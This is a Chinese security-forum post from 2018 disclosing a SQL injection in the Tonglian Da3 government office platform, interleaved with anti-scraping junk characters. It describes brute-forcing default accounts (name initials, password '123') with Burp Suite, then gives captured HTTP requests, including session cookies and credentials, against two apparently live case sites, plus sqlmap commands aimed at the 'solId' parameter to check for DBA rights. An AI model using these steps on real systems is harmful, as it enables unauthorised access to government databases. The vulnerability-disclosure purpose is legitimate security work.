找回密码
 立即注册
查看: 1821|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

$ u+ p7 B& L. M; C- ^
; P: @: ]5 a- g7 h: h- |! h

/ N+ a1 u- m6 `

$ S. C0 k/ t% c, X$ m9 m 平台简介:1 b" {/ M( N7 X+ [4 C5 n$ q, x

3 G( t1 E/ }6 L' e5 l

# E# s* U' ~" y" `2 l1 V   / G) @! i& q- Q* L, z

B' c$ D4 K, p6 u4 a7 L

: S7 w {) \! H( {9 D+ W 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
: [# R: o& _$ u7 O* B0 x2 N, W同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
! {3 w2 p+ j9 Y, ?$ I A同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!( I# z6 d" w Q+ ~

2 m" t3 }' a0 ~! q$ X% O

6 W& @0 u# e# `% T% h5 g. c8 i4 E  : `' r# Y4 B2 a; l& G

4 @/ v# w4 L! T2 ~, n: V( t1 u

9 r/ C- u9 m3 Y. a) `* U) I/ i$ E 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:3 L. T9 u, A7 g0 C3 \0 Z2 U L3 B' A

' \ L8 i( p; l- r

, t9 g0 d/ e9 v* ^& g4 E   ! N! I1 y5 w8 i, U. N% J+ [

0 ^5 i/ K7 j9 n2 c7 F. ?

# K/ D4 D. o4 Z' x$ i9 ^ k http://1.1.1.1:7197/cap-aco/#(案例2-)) o3 M# V4 u8 l/ {" n

6 {; D: d. i y! W+ f

; x/ L3 K5 _7 S6 j6 R; T http://www.XXOO.com (案例1-官网网站) . _% a( e* I3 k# @0 U- b# P

. u& }5 J% v- I& X, `% {

0 u& S$ t ]6 c2 t( q  1 S( @' |" }' b8 H

5 Y! F. c+ H W* t8 a; d& D! [

" F* D0 q9 f' B" r2 `# | 漏洞详情: - S3 r4 Z7 X, z8 n+ x" h/ z

* H* v' u6 V) K

5 m% c; u: o' c3 [  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试( |4 m; P6 D% U7 r% X3 g

$ G3 E* L7 a" L4 ]; w

# X& c1 t y! X, e- t9 ~      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: 6 o8 [" f$ O7 X( r: ?

7 z G u! w) G9 Y H4 g" ] q

# i; j# ?' h2 f; M   7 U# y; H( i, O; C

4 n, {7 g0 L4 v. H

7 v7 a* y8 {7 t! L  9 e, F) n, n7 s+ W2 l' \

; b# [! e5 q [' C" m* k

2 X" n$ j( Z' B1 P4 q, Q! E status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: : O" w5 h- C4 |4 J

. b" O/ O8 g, L5 E$ }

+ h) `' }- Q1 z0 N$ K1 a 1、案例1-官方网站 & j/ t! S3 f2 S/ h0 f7 ` ?" D

5 i4 B1 J4 w# d# c( `

* c0 _+ t' t6 y5 {1 L) S9 e GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.13 y( c& y/ C8 W A

- [0 o. O& s& ]

0 M) x% Y4 s2 p1 H7 U" ~ Host: www.XXOO.com3 ^. i7 F9 i) A- g

& q! l- [2 F6 p

7 k: J) @5 N# t Proxy-Connection: Keep-Alive P6 |5 | ?- B- |* H% m7 ~

8 J' r. z5 N# ?, ^1 k

& | |* a& T1 O: l4 c. O0 j Accept: application/json, text/javascript, */*; q=0.01 3 \0 k4 J- {; S% b J& \ Y

: [7 L& i, \* W

: x9 ?! k( B; P5 x Accept-Language: zh-CN) [* G1 i& U0 w! M( n: b K

( {0 C1 B: }4 `

! p' M/ z+ b4 S% h# V: z9 r( o Content-Type: application/json& p. |! c9 ^# }0 `( h

) c- p& J) s8 w/ M9 s3 k2 ]6 d

+ l6 s9 O; { P" `$ v' f# g User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko9 ?1 A: A" k7 P! ?: V

& M- e6 d. B; w" p6 D

8 d. _% R; r) \. B- O& f X-Requested-With: XMLHttpRequest8 v% ?2 v+ \7 \, K/ `# D& _7 P

5 B; E' q$ y; z! A; L

$ h( p3 n; p/ g+ @; l9 ?) P8 {. E Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002! \# q; s7 K1 d1 Z; t

; a. [% o: ^6 ~

9 \1 S2 R) \6 E* q3 L" T Accept-Encoding: gzip, deflate, sdch2 z# V' g/ e) ]! I2 ~2 J, x

6 g! @- Q8 t/ [ R/ ?+ g" M& H% R

0 O" {& d" o Q Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e( j, p( d: f) v$ e4 L% R7 x

0 b2 l4 k1 \0 ?6 C5 g2 \) G2 `

- J; m4 E7 @, i& y! s 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:) b$ Y4 v% q* C, B

( V" M: `2 d h# u3 L% l1 j2 ~+ w. {

& }# p1 S/ I5 f7 Y   0 H' k. {, z0 g1 `; h) O/ \

( O( f* d, W: {5 ^

' D3 a3 S, _- A% u3 r" f. i  % K( ^7 m6 w! b. i

9 f; v9 `$ F' Z4 D' u

1 u9 t+ j8 u7 j/ D  ; U& l# H( J% x8 M* {" S; Z, i \% d

4 r( u; z# \! t" @+ s" Q9 r5 O

+ j) I' V$ M& c! N8 s2 C. Z/ Y  5 n8 y: {* p5 P' T/ i F" A% p* i

, ?! X( s7 C7 Y8 M8 C% k7 L

% W- \& G9 O( m- Z: X; ]/ F6 |  9 R5 S, n7 K* C

! o8 J) I2 a/ f9 w

. f( P7 ^ J8 i7 m' I/ I. E 2、案例2-某天河云平台 ' g5 h) n/ i+ {8 I5 O2 C. i

- c3 v# `+ w% l3 q1 @* d+ g

: u4 [; b! G3 l/ x: O2 p GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 8 m1 l) W5 J" v; Z5 Y

7 |* ?4 w/ g$ q3 a, Z

- g9 s2 q. N2 p! u4 u, F" C Host: 1.1.1.:71971 e! v$ y- K: t# y

% \" Q# [; e( a

6 t$ ~: f6 t/ L, A% e- R1 n Accept: application/json, text/javascript, */*; q=0.01 ~! b8 V+ y8 U8 E, M+ m

$ w8 [' P* C: T: d2 ~8 m: `/ C

- f3 g7 w$ E; n7 }! w( ~8 L8 e- H* } X-Requested-With: XMLHttpRequest4 e' g! P* D7 P& }/ t& \

) {. V- h g& _: S

( |, h" }0 _: b5 x8 \ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0, m7 t% u0 |$ \+ ~3 ^' X

$ I7 ?$ [2 k' I. N. @% j

/ S5 q$ {+ d- D Content-Type: application/json1 f8 P+ _& v5 s' Z, |3 b1 }

$ Z% k) _" b; t% \* t

" U: j3 `' f) F2 m Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 ! M3 I- P7 i! V. d

! ~6 @; Q4 ]9 r x

; |3 B# m% j' ]: T$ _7 I0 \+ |* _ Accept-Language: zh-CN,zh;q=0.87 @& T4 \# Q5 b; {6 g

& M& f; z! ?* @2 @3 O

1 J% `- b! u: v. |3 |. ? Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 : c: o' D7 R* F7 C

1 D7 b0 D, q2 p" z. v

" O @, h3 ~/ C* _5 v7 O6 W; ^3 o Connection: close+ {* i/ {+ ` ?

, y/ o0 u/ O3 u6 ]- v

- X6 h9 b+ T9 a 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: F( H+ x# A9 [( J2 Y

' W6 N4 T" A1 l$ ^

8 u# @' \2 B# S I/ O7 ~   4 r; ^: G+ F1 `# W" z) |3 g

& ~2 r6 Y, @: c/ c8 z8 R% g

0 {" u: }( B7 J8 l7 h) a! D
# R2 }# }4 k+ r7 m# p

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表